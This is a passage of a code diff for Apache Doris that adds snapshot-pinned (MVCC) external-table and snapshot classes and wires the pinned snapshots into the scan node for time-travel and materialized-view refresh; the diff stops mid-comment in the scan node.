3fbe42d9c9911d..d54ba036caab86 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java @@ -169,7 +169,17 @@ public Optional initSchema() { } ConnectorTableSchema tableSchema = metadata.getTableSchema(session, handleOpt.get()); + return Optional.of(toSchemaCacheValue(metadata, session, dbName, tableName, tableSchema)); + } + /** + * Converts a connector {@link ConnectorTableSchema} into a {@link PluginDrivenSchemaCacheValue}: + * applies identifier mapping to the column names and derives the partition-column views from the + * {@code partition_columns} property. Shared by {@link #initSchema()} (latest schema) and the + * MVCC subclass (schema AS OF a pinned snapshot), so both produce byte-identical cache values. + */ + protected PluginDrivenSchemaCacheValue toSchemaCacheValue(ConnectorMetadata metadata, + ConnectorSession session, String dbName, String tableName, ConnectorTableSchema tableSchema) { // Apply identifier mapping to column names (lowercase / explicit mapping) List mappedColumns = new ArrayList<>(tableSchema.getColumns().size()); for (ConnectorColumn col : tableSchema.getColumns()) { @@ -211,7 +221,7 @@ public Optional initSchema() { } } } - return Optional.of(new PluginDrivenSchemaCacheValue(columns, partitionColumns, partitionColumnRemoteNames)); + return new PluginDrivenSchemaCacheValue(columns, partitionColumns, partitionColumnRemoteNames); } @Override diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccExternalTable.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccExternalTable.java new file mode 100644 index 00000000000000..33e2cfbadbae67 --- /dev/null +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccExternalTable.java @@ -0,0 +1,447 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.analysis.PartitionValue; +import org.apache.doris.analysis.TableScanParams; +import org.apache.doris.analysis.TableSnapshot; +import org.apache.doris.catalog.Column; +import org.apache.doris.catalog.ListPartitionItem; +import org.apache.doris.catalog.MTMV; +import org.apache.doris.catalog.PartitionItem; +import org.apache.doris.catalog.PartitionKey; +import org.apache.doris.catalog.PartitionType; +import org.apache.doris.catalog.Type; +import org.apache.doris.common.AnalysisException; +import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorPartitionInfo; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.ConnectorTableSchema; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot; +import org.apache.doris.connector.api.mvcc.ConnectorTimeTravelSpec; +import org.apache.doris.datasource.hive.HiveUtil; +import org.apache.doris.datasource.mvcc.MvccSnapshot; +import org.apache.doris.datasource.mvcc.MvccTable; +import org.apache.doris.datasource.mvcc.MvccUtil; +import org.apache.doris.mtmv.MTMVBaseTableIf; +import org.apache.doris.mtmv.MTMVRefreshContext; +import org.apache.doris.mtmv.MTMVRelatedTableIf; +import org.apache.doris.mtmv.MTMVSnapshotIdSnapshot; +import org.apache.doris.mtmv.MTMVSnapshotIf; +import org.apache.doris.mtmv.MTMVTimestampSnapshot; + +import com.google.common.base.Preconditions; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.util.Collections; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.Optional; +import java.util.Set; +import java.util.regex.Pattern; +import java.util.stream.Collectors; + +/** + * Generic MVCC/MTMV-capable {@link PluginDrivenExternalTable} for connectors that expose a + * point-in-time snapshot (e.g. Paimon, Iceberg, Hudi). All behavior is source-agnostic and driven + * through the connector SPI; the data-source-specific rendering of partition names/dates happens in + * the connector, so this class never parses raw values or imports any data-source library. + * + *

    Selected by a capability factory and wired into the scan node in a later dispatch; until then + * it has no production caller and is exercised only by direct-construction unit tests.

    + * + *

    MVCC/MTMV contract: a connector that advertises this capability MUST supply a real + * per-partition {@code lastModifiedMillis}. An {@link ConnectorPartitionInfo#UNKNOWN}(-1) is not a + * valid timestamp: it pins {@code MTMVTimestampSnapshot(-1)} in {@link #getPartitionSnapshot}, which + * degrades MTMV to conservative over-refresh (the partition never matches its prior snapshot).

    + */ +public class PluginDrivenMvccExternalTable extends PluginDrivenExternalTable + implements MTMVRelatedTableIf, MTMVBaseTableIf, MvccTable { + + private static final Logger LOG = LogManager.getLogger(PluginDrivenMvccExternalTable.class); + + /** Matches an all-digits string (epoch millis / snapshot id). Parity with {@code PaimonUtil.isDigitalString}. */ + private static final Pattern DIGITAL_REGEX = Pattern.compile("\\d+"); + + /** No-arg constructor for GSON deserialization. */ + public PluginDrivenMvccExternalTable() { + super(); + } + + public PluginDrivenMvccExternalTable(long id, String name, String remoteName, + ExternalCatalog catalog, ExternalDatabase db) { + super(id, name, remoteName, catalog, db); + } + + // ──────────────────── snapshot materialization ──────────────────── + + /** + * Returns the pinned snapshot if the caller supplied one (read the PIN, do NOT re-list), else + * materializes the LATEST snapshot from the connector. The query-begin pin path goes through + * {@link #loadSnapshot} which calls {@link #materializeLatest()} once; subsequent accessors + * receive that pin here and never re-query the connector (single-pin invariant). + */ + private PluginDrivenMvccSnapshot getOrMaterialize(Optional snapshot) { + if (snapshot.isPresent()) { + return (PluginDrivenMvccSnapshot) snapshot.get(); + } + return materializeLatest(); + } + + /** + * Lists the partition set at LATEST and pins the connector snapshot. The per-partition build is + * delegated to {@link #listLatestPartitions} (shared with the @incr path, which legacy also reads + * at LATEST). + */ + private PluginDrivenMvccSnapshot materializeLatest() { + makeSureInitialized(); + PluginDrivenExternalCatalog pluginCatalog = (PluginDrivenExternalCatalog) catalog; + Connector connector = pluginCatalog.getConnector(); + ConnectorSession session = pluginCatalog.buildConnectorSession(); + ConnectorMetadata metadata = connector.getMetadata(session); + + Optional handleOpt = resolveConnectorTableHandle(session, metadata); + if (!handleOpt.isPresent()) { + // No handle (e.g. table dropped): still return a valid empty pin so callers degrade to + // UNPARTITIONED / snapshot id -1 instead of NPE-ing. + return new PluginDrivenMvccSnapshot(emptySnapshot(), + Collections.emptyMap(), Collections.emptyMap()); + } + ConnectorTableHandle handle = handleOpt.get(); + + // An empty (no-snapshot) connector still pins: fall back to a snapshot id of -1. + ConnectorMvccSnapshot connectorSnapshot = + metadata.beginQuerySnapshot(session, handle).orElseGet(this::emptySnapshot); + + Map nameToPartitionItem = Maps.newHashMap(); + Map nameToLastModifiedMillis = Maps.newHashMap(); + listLatestPartitions(metadata, session, handle, nameToPartitionItem, nameToLastModifiedMillis); + return new PluginDrivenMvccSnapshot(connectorSnapshot, nameToPartitionItem, + nameToLastModifiedMillis); + } + + /** + * Lists the partition set at LATEST into the two supplied maps (rendered name -> built + * {@link PartitionItem} / -> last-modified epoch millis). Mirrors legacy + * {@code PaimonUtil.generatePartitionInfo}: per-partition build is wrapped in try/catch so a single + * un-parseable name is logged and skipped (leaving the listed-name set larger than the built-item + * set, which {@link PluginDrivenMvccSnapshot#isPartitionInvalid} then treats as UNPARTITIONED) + * rather than failing the whole query. + */ + private void listLatestPartitions(ConnectorMetadata metadata, ConnectorSession session, + ConnectorTableHandle handle, Map nameToPartitionItem, + Map nameToLastModifiedMillis) { + List partitionColumns = getPartitionColumns(); + List types = partitionColumns.stream().map(Column::getType).collect(Collectors.toList()); + List parts = metadata.listPartitions(session, handle, Optional.empty()); + for (ConnectorPartitionInfo part : parts) { + String partitionName = part.getPartitionName(); + nameToLastModifiedMillis.put(partitionName, part.getLastModifiedMillis()); + try { + // The connector already renders values (incl. dates) into getPartitionName(), so + // building from the rendered name is byte-parity with legacy. Partition values may be + // malformed; catch to avoid affecting the query (parity generatePartitionInfo). + nameToPartitionItem.put(partitionName, toListPartitionItem(partitionName, types)); + } catch (Exception e) { + LOG.warn("toListPartitionItem failed, partitionColumns: {}, partitionName: {}", + partitionColumns, partitionName, e); + } + } + } + + private ConnectorMvccSnapshot emptySnapshot() { + return ConnectorMvccSnapshot.builder().snapshotId(-1L).build(); + } + + /** + * Builds a {@link ListPartitionItem} from a RENDERED partition name (e.g. {@code "dt=2024-01-01"}). + * Copied verbatim from legacy {@code PaimonUtil.toListPartitionItem}; it is source-agnostic. + */ + private static ListPartitionItem toListPartitionItem(String partitionName, List types) + throws AnalysisException { + // Partition name will be in format: nation=cn/city=beijing + // parse it to get values "cn" and "beijing" + List partitionValues = HiveUtil.toPartitionValues(partitionName); + Preconditions.checkState(partitionValues.size() == types.size(), partitionName + " vs. " + types); + List values = Lists.newArrayListWithExpectedSize(types.size()); + for (String partitionValue : partitionValues) { + values.add(new PartitionValue(partitionValue, false)); + } + PartitionKey key = PartitionKey.createListPartitionKeyWithTypes(values, types, true); + return new ListPartitionItem(Lists.newArrayList(key)); + } + + // ──────────────────── MvccTable ──────────────────── + + @Override + public MvccSnapshot loadSnapshot(Optional tableSnapshot, Optional scanParams) { + if (!tableSnapshot.isPresent() && !scanParams.isPresent()) { + // B5a implicit query-begin (latest) pin. + return materializeLatest(); + } + // Mutual exclusion — parity with legacy PaimonScanNode.getProcessedTable:891-892. + if (tableSnapshot.isPresent() && scanParams.isPresent()) { + throw new RuntimeException("Can not specify scan params and table snapshot at same time."); + } + ConnectorTimeTravelSpec spec = toTimeTravelSpec(tableSnapshot, scanParams); + + makeSureInitialized(); + PluginDrivenExternalCatalog pluginCatalog = (PluginDrivenExternalCatalog) catalog; + Connector connector = pluginCatalog.getConnector(); + ConnectorSession session = pluginCatalog.buildConnectorSession(); + ConnectorMetadata metadata = connector.getMetadata(session); + String dbName = db != null ? db.getRemoteName() : ""; + String tableName = getRemoteName(); + Optional handleOpt = resolveConnectorTableHandle(session, metadata); + if (!handleOpt.isPresent()) { + throw new RuntimeException("can not find table for time travel: " + dbName + "." + tableName); + } + ConnectorTableHandle handle = handleOpt.get(); + + // The connector owns all provider-specific resolution (snapshot-id lookup, datetime parsing, + // tag/branch resolution, incremental-window validation). It returns empty when the target is + // not found; a DorisConnectorException (TZ-alias / incremental-validation) propagates as-is + // (fail-loud — a degraded result would read wrong rows for a time-travel query). + Optional resolved = metadata.resolveTimeTravel(session, handle, spec); + if (!resolved.isPresent()) { + throw new RuntimeException(notFoundMessage(spec)); + } + ConnectorMvccSnapshot connectorSnapshot = resolved.get(); + + if (spec.getKind() == ConnectorTimeTravelSpec.Kind.INCREMENTAL) { + // @incr is NOT a point-in-time snapshot pin. Legacy PaimonExternalTable.getPaimonSnapshotCacheValue + // falls through (it is neither tag/branch nor FOR VERSION/TIME AS OF) to getLatestSnapshotCacheValue + // — i.e. the LATEST partition view + LATEST schema — and applies the incremental-between window at + // SCAN time. Mirror that: list the LATEST partitions and use the LATEST schema (pinnedSchema == null + // so getSchemaCacheValue() falls back to latest), while carrying the incremental scan options on the + // pin (connectorSnapshot.getProperties()); the scan node's applySnapshot threads them onto the handle. + // Partitions are listed on the BASE handle at latest — the full latest set, identical to the + // normal-read materializeLatest path — NOT a snapshot-pinned handle. + Map nameToPartitionItem = Maps.newHashMap(); + Map nameToLastModifiedMillis = Maps.newHashMap(); + listLatestPartitions(metadata, session, handle, nameToPartitionItem, nameToLastModifiedMillis); + return new PluginDrivenMvccSnapshot(connectorSnapshot, nameToPartitionItem, + nameToLastModifiedMillis, null); + } + + // Schema-at-snapshot: thread the pin onto the handle FIRST (applySnapshot), so a BRANCH pin + // yields a branch-aware handle whose schemaManager resolves the branch schema; then resolve + // the schema AT the pinned schemaId. For non-branch specs applySnapshot only adds scan options + // that getTableSchema ignores, so passing the pinned handle is harmless. (Apply-before- + // getTableSchema is REQUIRED for branch — using the base handle would resolve the branch + // schemaId against the base table's schemaManager = wrong schema.) + ConnectorTableHandle pinnedHandle = metadata.applySnapshot(session, handle, connectorSnapshot); + ConnectorTableSchema atSchema = metadata.getTableSchema(session, pinnedHandle, connectorSnapshot); + PluginDrivenSchemaCacheValue pinnedSchema = + toSchemaCacheValue(metadata, session, dbName, tableName, atSchema); + + // Explicit point-in-time time-travel (snapshot id / tag / timestamp / branch) does NOT list + // partitions (EMPTY partition maps) — parity with legacy PaimonPartitionInfo.EMPTY. The empty + // maps make isPartitionInvalid() == (0!=0) == false, so getPartitionColumns(snapshot) flows + // through super -> the schema-aware getSchemaCacheValue() below -> the pinned schema's partition + // columns. Partition pruning is deferred to the connector's predicate pushdown (the generic scan + // node's resolveRequiredPartitions treats this empty-universe pin as scan-all). + return new PluginDrivenMvccSnapshot(connectorSnapshot, + Collections.emptyMap(), Collections.emptyMap(), pinnedSchema); + } + + /** + * Source-agnostic dispatch of the analyzer's {@code FOR VERSION/TIME AS OF} ({@link TableSnapshot}) + * or {@code @tag/@branch/@incr} ({@link TableScanParams}) into a {@link ConnectorTimeTravelSpec}. + * Mirrors the legacy {@code PaimonExternalTable.getPaimonSnapshotCacheValue} + {@code PaimonScanNode} + * dispatch: a digital {@code FOR VERSION AS OF} is a snapshot id, a non-digital one is a tag name. + */ + private ConnectorTimeTravelSpec toTimeTravelSpec(Optional ts, Optional sp) { + if (ts.isPresent()) { + TableSnapshot snap = ts.get(); + String value = snap.getValue(); + if (snap.getType() == TableSnapshot.VersionType.TIME) { + return ConnectorTimeTravelSpec.timestamp(value, isDigital(value)); // FOR TIME AS OF + } + // FOR VERSION AS OF: digital -> snapshot id, non-digital -> tag name. + return isDigital(value) + ? ConnectorTimeTravelSpec.snapshotId(value) + : ConnectorTimeTravelSpec.tag(value); + } + TableScanParams params = sp.get(); + if (params.isTag()) { + return ConnectorTimeTravelSpec.tag(extractBranchOrTagName(params)); + } + if (params.isBranch()) { + return ConnectorTimeTravelSpec.branch(extractBranchOrTagName(params)); + } + if (params.incrementalRead()) { + return ConnectorTimeTravelSpec.incremental(params.getMapParams()); + } + throw new RuntimeException("unsupported scan params: " + params.getParamType()); + } + + /** Parity: {@code PaimonUtil.isDigitalString}. */ + private static boolean isDigital(String value) { + return value != null && DIGITAL_REGEX.matcher(value).matches(); + } + + /** Parity: {@code PaimonUtil.extractBranchOrTagName} (uses {@code TableScanParams.PARAMS_NAME == "name"}). */ + private static String extractBranchOrTagName(TableScanParams params) { + if (!params.getMapParams().isEmpty()) { + if (!params.getMapParams().containsKey(TableScanParams.PARAMS_NAME)) { + throw new IllegalArgumentException("must contain key 'name' in params"); + } + return params.getMapParams().get(TableScanParams.PARAMS_NAME); + } + if (params.getListParams().isEmpty() || params.getListParams().get(0) == null) { + throw new IllegalArgumentException("must contain a branch/tag name in params"); + } + return params.getListParams().get(0); + } + + /** Translates a {@code resolveTimeTravel}-returned empty into a kind-specific user error message. */ + private static String notFoundMessage(ConnectorTimeTravelSpec spec) { + switch (spec.getKind()) { + case SNAPSHOT_ID: + return "can't find snapshot by id: " + spec.getStringValue(); // parity PaimonUtil:687 + case TAG: + return "can't find snapshot by tag: " + spec.getStringValue(); // parity PaimonUtil:694 + case BRANCH: + return "can't find branch: " + spec.getStringValue(); // parity PaimonUtil:707 + case TIMESTAMP: + // Best-effort: the connector returns empty (it owns the parsed millis + earliest + // snapshot, which fe-core cannot see), so this diverges from legacy's detailed + // "...the earliest snapshot's timestamp is [...]" message in TEXT ONLY (same error + // condition). Documented divergence. + return "can't find snapshot earlier than or equal to time: " + spec.getStringValue(); + default: + return "can't resolve time travel: " + spec; + } + } + + // ──────────────────── schema (snapshot-aware) ──────────────────── + + /** + * Returns the schema AS OF the context-pinned snapshot when an explicit time-travel pin carries a + * pinned schema (schema-at-snapshot under schema evolution), else the latest schema. Parity with + * legacy {@code PaimonExternalTable.getSchemaCacheValue}, which returns the schema of the + * context-pinned snapshot. + */ + @Override + public Optional getSchemaCacheValue() { + Optional ctx = MvccUtil.getSnapshotFromContext(this); + if (ctx.isPresent() && ctx.get() instanceof PluginDrivenMvccSnapshot) { + SchemaCacheValue pinned = ((PluginDrivenMvccSnapshot) ctx.get()).getPinnedSchema(); + if (pinned != null) { + return Optional.of(pinned); // time-travel: schema AS OF the pinned snapshot + } + } + return getLatestSchemaCacheValue(); // latest (B5a pin has pinnedSchema==null, or no pin) + } + + /** Seam for the LATEST (non-pinned) schema; default delegates to the cached super. Overridable in tests. */ + protected Optional getLatestSchemaCacheValue() { + return super.getSchemaCacheValue(); + } + + // ──────────────────── partition view (snapshot-aware) ──────────────────── + + @Override + public Map getNameToPartitionItems(Optional snapshot) { + return getOrMaterialize(snapshot).getNameToPartitionItem(); + } + + @Override + public Map getAndCopyPartitionItems(Optional snapshot) { + return new HashMap<>(getNameToPartitionItems(snapshot)); + } + + @Override + public PartitionType getPartitionType(Optional snapshot) { + if (getOrMaterialize(snapshot).isPartitionInvalid()) { + return PartitionType.UNPARTITIONED; + } + return getPartitionColumns(snapshot).size() > 0 ? PartitionType.LIST : PartitionType.UNPARTITIONED; + } + + @Override + public List getPartitionColumns(Optional snapshot) { + // Legacy empties the partition columns on an invalid partition set so the table is treated + // as UNPARTITIONED everywhere downstream. + return getOrMaterialize(snapshot).isPartitionInvalid() ? Collections.emptyList() : super.getPartitionColumns(); + } + + @Override + public Set getPartitionColumnNames(Optional snapshot) { + return getPartitionColumns(snapshot).stream() + .map(c -> c.getName().toLowerCase()).collect(Collectors.toSet()); + } + + // ──────────────────── MTMV snapshots ──────────────────── + + @Override + public MTMVSnapshotIf getPartitionSnapshot(String partitionName, MTMVRefreshContext context, + Optional snapshot) throws AnalysisException { + Long ts = getOrMaterialize(snapshot).getNameToLastModifiedMillis().get(partitionName); + if (ts == null) { + throw new AnalysisException("can not find partition: " + partitionName); + } + return new MTMVTimestampSnapshot(ts); + } + + @Override + public MTMVSnapshotIf getTableSnapshot(MTMVRefreshContext context, Optional snapshot) + throws AnalysisException { + return getTableSnapshot(snapshot); + } + + @Override + public MTMVSnapshotIf getTableSnapshot(Optional snapshot) throws AnalysisException { + return new MTMVSnapshotIdSnapshot(getOrMaterialize(snapshot).getConnectorSnapshot().getSnapshotId()); + } + + @Override + public long getNewestUpdateVersionOrTime() { + // Dictionary-update path: always probe LATEST (bypass any context pin), mirroring legacy + // which passes empty/empty to force a fresh listing. + // Skip the UNKNOWN(-1) sentinel (a connector that did not collect a modified time): legacy + // used Paimon's lastFileCreationTime() which has no -1 sentinel, so feeding -1 into max() + // would let the sentinel win on an all-unknown table (returning -1 instead of the legacy 0). + return materializeLatest().getNameToLastModifiedMillis().values().stream() + .mapToLong(Long::longValue).filter(v -> v >= 0).max().orElse(0L); + } + + @Override + public boolean isPartitionColumnAllowNull() { + // Returns true so MTMV creation over a snapshot connector is not blocked: a source may write a + // physical "null" partition that does not match Doris' empty-partition semantics (e.g. paimon + // writes both null and the literal 'null' to the 'null' partition). Returning false would + // reject the MV; the connector owns the null-partition semantics, so we allow it. Parity with + // legacy PaimonExternalTable.isPartitionColumnAllowNull. + return true; + } + + // ──────────────────── MTMVBaseTableIf ──────────────────── + + @Override + public void beforeMTMVRefresh(MTMV mtmv) { + // No-op: parity with legacy PaimonExternalTable.beforeMTMVRefresh. + } +} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccSnapshot.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccSnapshot.java new file mode 100644 index 00000000000000..dd3f600cc3a539 --- /dev/null +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccSnapshot.java @@ -0,0 +1,124 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.catalog.PartitionItem; +import org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot; +import org.apache.doris.datasource.mvcc.MvccSnapshot; + +import java.util.Collections; +import java.util.HashMap; +import java.util.Map; + +/** + * Generic MVCC snapshot for plugin-driven (connector SPI) tables. + * + *

    Pins a single point-in-time view of an MVCC-capable connector table for the whole duration of + * a query: the scalar {@link ConnectorMvccSnapshot} (the snapshot-id pin used for reads) plus the + * materialized partition view listed at that moment. Holding the materialized view here means every + * MTMV/MvccTable accessor that receives this snapshot reads the SAME partition set with NO extra + * connector round-trip (single-pin invariant).

    + * + *

    Source-agnostic: it carries already-rendered partition names/items and per-partition staleness + * timestamps, so no data-source-specific logic lives in fe-core. Parity with the legacy + * {@code PaimonMvccSnapshot}/{@code PaimonPartitionInfo} pair.

    + * + *

    For an explicit time-travel pin it ALSO carries the schema AS OF the pinned snapshot + * ({@code pinnedSchema}), so reads under schema evolution see the historical columns; a {@code null} + * pinnedSchema means "use the latest schema" (parity with legacy + * {@code PaimonExternalTable.getSchemaCacheValue} reading the context-pinned snapshot's schema).

    + */ +public class PluginDrivenMvccSnapshot implements MvccSnapshot { + + private final ConnectorMvccSnapshot connectorSnapshot; + private final Map nameToPartitionItem; + private final Map nameToLastModifiedMillis; + private final SchemaCacheValue pinnedSchema; + + /** + * @param connectorSnapshot the scalar snapshot pin (snapshot id used for reads) + * @param nameToPartitionItem rendered partition name -> built {@link PartitionItem} + * @param nameToLastModifiedMillis rendered partition name -> last-modified epoch millis (one + * entry per listed partition, BEFORE any per-partition item build + * failure dropped a name from {@code nameToPartitionItem}) + */ + public PluginDrivenMvccSnapshot(ConnectorMvccSnapshot connectorSnapshot, + Map nameToPartitionItem, + Map nameToLastModifiedMillis) { + this(connectorSnapshot, nameToPartitionItem, nameToLastModifiedMillis, null); + } + + /** + * @param connectorSnapshot the scalar snapshot pin (snapshot id used for reads) + * @param nameToPartitionItem rendered partition name -> built {@link PartitionItem} + * @param nameToLastModifiedMillis rendered partition name -> last-modified epoch millis + * @param pinnedSchema the schema AS OF the pinned snapshot (schema-at-snapshot under + * schema evolution); {@code null} = use the latest schema + */ + public PluginDrivenMvccSnapshot(ConnectorMvccSnapshot connectorSnapshot, + Map nameToPartitionItem, + Map nameToLastModifiedMillis, + SchemaCacheValue pinnedSchema) { + this.connectorSnapshot = connectorSnapshot; + this.nameToPartitionItem = nameToPartitionItem == null + ? Collections.emptyMap() + : Collections.unmodifiableMap(new HashMap<>(nameToPartitionItem)); + this.nameToLastModifiedMillis = nameToLastModifiedMillis == null + ? Collections.emptyMap() + : Collections.unmodifiableMap(new HashMap<>(nameToLastModifiedMillis)); + this.pinnedSchema = pinnedSchema; + } + + public ConnectorMvccSnapshot getConnectorSnapshot() { + return connectorSnapshot; + } + + /** + * The schema AS OF the pinned snapshot for time-travel under schema evolution; {@code null} for + * the latest pin (B5a query-begin) or the no-handle path, meaning the caller uses the latest + * schema. + */ + public SchemaCacheValue getPinnedSchema() { + return pinnedSchema; + } + + /** Convenience: the schema version of the pinned connector snapshot ({@code -1} = unknown). */ + public long getSchemaId() { + return connectorSnapshot.getSchemaId(); + } + + public Map getNameToPartitionItem() { + return nameToPartitionItem; + } + + public Map getNameToLastModifiedMillis() { + return nameToLastModifiedMillis; + } + + /** + * True when at least one listed partition failed to build into a {@link PartitionItem} (its + * rendered name could not be parsed), i.e. the built item map is short of the listed partition + * set, so the caller falls back to UNPARTITIONED rather than silently pruning to a partial set. + * Both maps are keyed by the rendered partition name, so this compares like-for-like: a connector + * emitting two partitions that render to the same name collapses both maps equally and is NOT + * flagged invalid. Parity with legacy {@code PaimonPartitionInfo.isPartitionInvalid}. + */ + public boolean isPartitionInvalid() { + return nameToLastModifiedMillis.size() != nameToPartitionItem.size(); + } +} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java index bfb77a055ca628..c51afb63a63b47 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java @@ -31,6 +31,7 @@ import org.apache.doris.connector.api.handle.ConnectorColumnHandle; import org.apache.doris.connector.api.handle.ConnectorTableHandle; import org.apache.doris.connector.api.handle.PassthroughQueryTableHandle; +import org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot; import org.apache.doris.connector.api.pushdown.ConnectorExpression; import org.apache.doris.connector.api.pushdown.ConnectorFilterConstraint; import org.apache.doris.connector.api.pushdown.FilterApplicationResult; @@ -39,6 +40,8 @@ import org.apache.doris.connector.api.scan.ConnectorScanPlanProvider; import org.apache.doris.connector.api.scan.ConnectorScanRange; import org.apache.doris.connector.api.scan.ScanNodePropertiesResult; +import org.apache.doris.datasource.mvcc.MvccSnapshot; +import org.apache.doris.datasource.mvcc.MvccUtil; import org.apache.doris.nereids.trees.plans.logical.LogicalFileScan.SelectedPartitions; import org.apache.doris.planner.PlanNodeId; import org.apache.doris.planner.ScanContext; @@ -177,6 +180,21 @@ static List resolveRequiredPartitions(SelectedPartitions selectedPartiti if (selectedPartitions == null || !selectedPartitions.isPruned) { return null; } + // A pruned-but-EMPTY selection over an EMPTY partition universe (totalPartitionNum == 0) means FE + // never enumerated any partitions to prune against — e.g. an MVCC time-travel pin (FOR VERSION/TIME + // AS OF, @tag, @branch) whose snapshot deliberately carries an empty partition-item map and defers + // partition resolution to the connector's predicate pushdown. Treat it as scan-all (null) so the + // getSplits() short-circuit does NOT fire and planScan runs, mirroring legacy PaimonScanNode (which + // ignores selectedPartitions and re-plans through the SDK with the pushed predicate). A GENUINE + // prune-to-zero over a NON-empty universe (totalPartitionNum > 0, e.g. MaxCompute WHERE + // part=) keeps the empty set so getSplits() short-circuits to zero rows — the + // existing MaxCompute parity behavior (FIX-NONPART-PRUNE-DATALOSS sibling). NB: for a partitioned + // MaxCompute table that genuinely has ZERO partitions this scan-all is row-equivalent to legacy's + // unconditional empty short-circuit — MaxComputeScanPlanProvider.planScan returns no splits when + // getFileNum() <= 0, still zero rows. + if (selectedPartitions.selectedPartitions.isEmpty() && selectedPartitions.totalPartitionNum == 0) { + return null; + } return new ArrayList<>(selectedPartitions.selectedPartitions.keySet()); } @@ -434,6 +452,44 @@ private void tryPushDownProjection(List columns) { } } + /** + * Threads the pinned MVCC snapshot (if any) onto the table handle via the SPI + * {@link ConnectorMetadata#applySnapshot} protocol. WHY: an MVCC-capable connector (e.g. a + * time-travel / MTMV-consistent read) must consume the SAME pinned point-in-time snapshot at + * every scan-side consumption of the handle ({@code planScan} and the serialized-table / + * {@code getScanNodeProperties} path); the pin therefore has to be threaded onto the handle + * BEFORE each of those points or one path silently reads LATEST. {@code applySnapshot} is + * idempotent (it re-derives the scan options from the snapshot each call), so calling this at + * every consumption site is safe. A missing pin — before the connector is MVCC-cutover, or a + * non-MVCC table, or a foreign (non-plugin) snapshot — leaves the handle unchanged (reads latest). + * + *

    Package-private static so the correctness-critical pin-vs-skip decision is unit-testable + * directly on Mockito mocks, without constructing a {@link FileQueryScanNode} (the call-site + * wiring is covered by live e2e — see DV-019). + */ + static ConnectorTableHandle applyMvccSnapshotPin(ConnectorMetadata metadata, ConnectorSession session, + ConnectorTableHandle handle, Optional snapshot) { + if (snapshot.isPresent() && snapshot.get() instanceof PluginDrivenMvccSnapshot) { + ConnectorMvccSnapshot connectorSnapshot = + ((PluginDrivenMvccSnapshot) snapshot.get()).getConnectorSnapshot(); + return metadata.applySnapshot(session, handle, connectorSnapshot); + } + // No pin in context, or a non-plugin snapshot -> read latest (unchanged handle). + return handle; + } + + /** + * Resolves the pinned MVCC snapshot from the statement context and threads it onto + * {@link #currentHandle} (mutates the handle exactly like {@link #tryPushDownProjection} / + * {@link #tryPushDownLimit}). Called at every scan-side handle-consumption point so both the + * split path and the serialized-table path read at the pinned snapshot. + */ + private void pinMvccSnapshot() throws UserException { + ConnectorMetadata metadata = connector.getMetadata(connectorSession); + Optional snapshot = MvccUtil.getSnapshotFromContext(getTargetTable()); + currentHandle = applyMvccSnapshotPin(metadata, connectorSession, currentHandle, snapshot); + } + /** * Fail-loud guard for plugin system-table scans: a {@link PluginDrivenSysExternalTable} must * reject {@code FOR TIME AS OF} (snapshot) and {@code @incr}/scan-params queries rather than @@ -492,6 +548,10 @@ public List getSplits(int numBackends) throws UserException { List columns = buildColumnHandles(); tryPushDownProjection(columns); Optional remainingFilter = buildRemainingFilter(); + // Pin the MVCC snapshot onto currentHandle AFTER projection/filter pushdown rebuilt it and + // immediately before planScan consumes it, so the native split path reads at the pinned + // snapshot. getSplits already declares UserException, so a getTargetTable() failure propagates. + pinMvccSnapshot(); // If buildRemainingFilter stripped non-pushable (CAST) conjuncts (filteredToOriginalIndex // != null), suppress source-side LIMIT pushdown: the connector now sees a filter that no @@ -626,6 +686,16 @@ public void startSplit(int numBackends) { final List columns = buildColumnHandles(); tryPushDownProjection(columns); final Optional remainingFilter = buildRemainingFilter(); + // Pin the MVCC snapshot onto currentHandle before the resolved handle is captured below, so + // the async batch path (planScanForPartitionBatch) reads at the pinned snapshot. startSplit + // cannot throw checked exceptions, so surface a getTargetTable() failure through the + // SplitAssignment error channel 